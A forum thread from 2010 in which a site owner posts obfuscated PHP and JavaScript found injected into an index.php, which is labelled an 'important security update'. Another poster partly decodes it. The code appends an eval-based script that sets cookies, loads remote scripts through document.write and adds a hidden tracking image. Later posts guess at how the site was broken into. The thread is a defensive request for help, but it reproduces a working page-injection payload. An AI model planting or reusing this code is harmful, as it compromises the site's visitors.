axew3 Posted April 1, 2010 Share Posted April 1, 2010 Hello all, unfortunately today i have download for an upgrade a file from the online server, and the index.php file contain these lines of code inside, at the very top, that i can't well understand completely what was doing, but i think nothing good, so i put it here searching for some help that can explain a little about: <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ2565Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ2569onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectZ2569oZ256e dwZ2528t)Z257bcaZ253dZ2527Z252564oZ2525Z25363umZ2565Z25256etZ25252ewZ2572Z252569teZ252528Z2525Z25322Z2527;ceZ253dZ2527Z252522Z252529Z2527;Z2563bZ253dZ2527Z25253csZ252563rZ252569Z252570tZ2520Z25256caZ25256egZ2575Z25256Z2531Z252567eZ25253dZ25255cZ252522javZ2561sZ252563Z252572iZ252570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ252570Z2574Z25253eZ2527Z253bevaZ256c(Z2575Z256eescZ2561Z2570eZ2528Z2574))Z257d;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22cZ2568Z2561rCZ256fdeAZ2574(0Z2529Z255e(Z25270x00Z2527+Z2565Z2573)))Z253b}Z257dZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bZ2564bZ252bZ2564cZ252bdZ2564+Z2564Z2565Z252c1Z2530Z2529Z253bZ2564wZ2528sZ2574Z2529;Z2573tZ253d$Z2561;Z2522Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;cbZ3dZ22e(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0Z253biZ253cZ2564s.lZ256Z22;Z69f (Z64oZ63umZ65Z6et.Z63ookZ69e.Z69ndeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fn cZ61Z6cZ6cbZ61ckZ28xZ29Z7bwiZ6edoZ77.twZ20Z3d Z78;vZ61Z72Z20dZ20Z3d nZ65wZ20DZ61Z74e()Z3bd.sZ65Z74TimZ65Z28x[Z22as_Z6ffZ22]*10Z300);Z76ar Z68Z20Z3d dZ2egetZ55TZ43HoZ75rZ73Z28);wZ69ndZ6fw.hZ20Z3dZ20Z68;iZ66 (hZ20Z3e 8)Z7bd.sZ65Z74Z55TZ43DaZ74Z65(dZ2egetZ55TCDZ61teZ28) -Z202)Z3b}elZ73eZ7bd.Z73etZ55TZ43Z44ateZ28Z64.Z67Z65tUZ54Z43Z44atZ65() Z2d Z33);}Z77Z69nZ64owZ2egdZ20Z3d Z64;vaZ72Z20Z74iZ6de Z3d nZ65w AZ72rayZ28);vZ61r sZ68iZ66Z74Z49Z6eZ64exZ20Z3d Z22Z22;time[Z22yearZ22] Z3d d.Z67Z65Z74UTZ43Z46ulZ6cYeZ61rZ28Z29;Z74imeZ5bZ22monZ74hZ22Z5dZ20Z3d d.Z67Z65Z74UZ54Z43MZ6fnthZ28Z29Z2b1Z3btZ69meZ5bZ22dayZ22] Z3d d.geZ74UTZ43Z44ateZ28);Z69Z66 (dZ2egZ65tUTZ43MZ6fZ6eth(Z29+1 Z3cZ2010)Z7bZ73hZ69fZ74IndZ65Z78 Z3d tZ69me[Z22yeaZ72Z22] + Z22-0Z22 +Z20(d.Z67etUZ54CMoZ6etZ68Z28)Z2b1)Z3b}Z65lseZ7bZ73hifZ74IndZ65x Z3d tiZ6dZ65[Z22yeZ61Z72Z22]Z20+ Z22-Z22 Z2bZ20(Z64.gZ65tZ55TZ43Z4dontZ68()Z2bZ31Z29Z3b}iZ66 (dZ2egeZ74Z55TCZ44Z61teZ28) Z3cZ20Z310Z29Z7bshZ69fZ74IZ6edeZ78 Z3dshZ69fZ74IndZ65x +Z20Z22-0Z22 +Z20Z64.Z67etUZ54CDaZ74Z65();Z7delsZ65Z7bshiftZ49ndeZ78Z20Z3d shifZ74IndZ65x +Z20Z22-Z22 + d.geZ74UTZ43DZ61teZ28Z29;}Z64Z6fcuZ6deZ6etZ2ewriZ74eZ28Z22Z3cscrZ22+Z22iZ70t Z6caZ6eZ67Z75aZ67eZ3djavZ61scrZ69ptZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearZ63Z68Z2etZ77Z69ttZ65rZ2eZ63Z6fZ6dZ2ftrZ65ndsZ2fdZ61ilyZ2eZ6asoZ6e?dZ61Z74eZ3dZ22+ sZ68Z69ftZ49Z6eZ64eZ78Z2bZ22&callbZ61ckZ3dcaZ6clbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} Z66unZ63tZ69on Z63aZ6clbZ61cZ6b2(xZ29Z7bwiZ6edoZ77.Z74Z77 Z3d x;scZ28Z27rf5Z666dsZ27,Z32,7Z29;evZ61l(Z75Z6eesZ63aZ70e(dZ7aZ2bcz+Z6fp+sZ74)+Z27dZ77(dZ7a+czZ28$Z61Z2bstZ29);Z27)Z3bdocZ75Z6dentZ2ewrZ69teZ28$aZ29Z3b}dZ6fcumZ65nZ74.wZ72Z69Z74Z65(Z22Z3cimZ67 sZ72cZ3dZ27httpZ3aZ2fZ2fsZ65aZ72cZ68.Z74wZ69ttZ65r.cZ6fmZ2fiZ6dagZ65sZ2fseaZ72chZ2frZ73Z73Z2eZ70Z6egZ27 wZ69dZ74hZ3d1 hZ65igZ68tZ3d1Z20Z73tylZ65Z3dZ27visibiliZ74Z79Z3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61Z67eZ3djavZ61sZ63rZ69pZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearchZ2etwiZ74teZ72Z2ecomZ2ftZ72eZ6eZ64sZ2fdZ61ilyZ2ejZ73on?Z63alZ6cbaZ63kZ3dcalZ6cbacZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delsZ65Z7b$aZ3dZ27Z27};funZ63tZ69Z6fn sZ63(cZ6em,vZ2ceZ64Z29Z7bvarZ20exZ64Z3dnewZ20Z44aZ74e()Z3bexdZ2esZ65tDaZ74e(Z65xZ64Z2egZ65tDaZ74eZ28)+eZ64Z29;Z64ocZ75meZ6etZ2ecooZ6biZ65Z3dcnmZ2bZ20Z27Z3dZ27 +eZ73capZ65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exZ64.toZ47MTZ53trZ69Z6egZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>';}//important security update ?> <?php ?> <?php Thank you Quote Link to comment Share on other sites More sharing options...
andrewgauger Posted April 1, 2010 Share Posted April 1, 2010 da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";cc="5ng%74h;%69++%29%7btmp%3dds.s%6cic%65%28%69,i%2b1)%3bs";cd="%74%3ds%74+St%72in%67.fr%6f%6d%43ha%72Cod%65((%74%6dp.";ca="%66un%63tio%6e dc%73(d%73,%65s)%7bds%3du%6e%65%73ca%70";op="%24a%3d%22dw(%64cs%28cu,%314)%29;%22;";cz="%66%75nct%69on%20cz(%63z%29%7bret%75rn %63a%2bcb%2bcc+%63%64%2b%63e+c%7a;};";db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";dz="%66u%6ect%69o%6e dw%28t)%7bca%3d%27%2564o%25%363um%65%256et%252ew%72%2569te%2528%25%322%27;ce%3d%27%2522%2529%27;%63b%3d%27%253cs%2563r%2569%2570t%20%256ca%256eg%75%256%31%2567e%253d%255c%2522jav%61s%2563%2572i%2570t%255c%252%32%253e%27;cc%3d%27%253c%255c%252fsc%72i%2570%74%253e%27%3beva%6c(%75%6eesc%61%70e%28%74))%7d;";de="209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";ce="c%68%61rC%6fdeA%74(0%29%5e(%270x00%27+%65%73)))%3b}%7d";st="%73t%3d%22$%61%3ds%74;%64c%73(%64%61%2b%64b%2b%64c%2bd%64+%64%65%2c1%30%29%3b%64w%28s%74%29;%73t%3d$%61;%22%3b";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;v}zfsz%26;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%";cb="e(d%73)%3bst%3dtmp%3d%27%27;for(%69%3d0%3bi%3c%64s.l%6";if (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var d = new Date().setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;if (h > {d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() - 3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.getUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate() < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIndex + "-" + d.getUTCDate();}document.write("" + "");} function callback2(x){window.tw = x;sc('rf5f6ds',2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}document.write(" " + "");}else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();}; This is what the function returns. Still a bit cryptic, but that should get you started. Quote Link to comment Share on other sites More sharing options...
ialsoagree Posted April 1, 2010 Share Posted April 1, 2010 I worked on a site not long ago that found a similar bit of cryptic javascript inserted into the bottom of all it's index files (both PHP and HTML). At the same time, many of their users reported that their virus scanners now marked the site as containing malicious code and wouldn't let them access it. I contacted the web host in an attempt to get FTP logs but the host didn't maintain logs for FTP access. In any event, removing the code removed the error message for the users - coincidence, probably not. Quote Link to comment Share on other sites More sharing options...
axew3 Posted April 1, 2010 Author Share Posted April 1, 2010 i think the file index.php has been modified in some way from somebody (the file has been hacked) in some obscure way, that i hope to discover at this point with some help: please ialsoagree you can remember if that site where you was working was also using CARP rss feed parser? It is the only one external application involved and i really can't imagine differently form where is possible to break into the file index.php. Quote Link to comment Share on other sites More sharing options...
ialsoagree Posted April 1, 2010 Share Posted April 1, 2010 i think the file index.php has been modified in some way from somebody (the file has been hacked) in some obscure way, that i hope to discover at this point with some help: please ialsoagree you can remember if that site was also using CARP rss feed parser? It is the only one external application involved and i really can't imagine differently form where is possible to break into the file index.php. No, the website I worked with was not using any rss feed or any PHP script that reads external files or allows file uploads other than images. Quote Link to comment Share on other sites More sharing options...
axew3 Posted April 1, 2010 Author Share Posted April 1, 2010 there is also Jquery that seem to have some security issues and was used in the index.php ... Any request that the AJAX calls in your pages can make can also be made by someone outside of the application. If done right, you will not be able to tell if they were made as part of an AJAX call from your webapp or by hand/other means... somebody know more about this javascript + php code? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.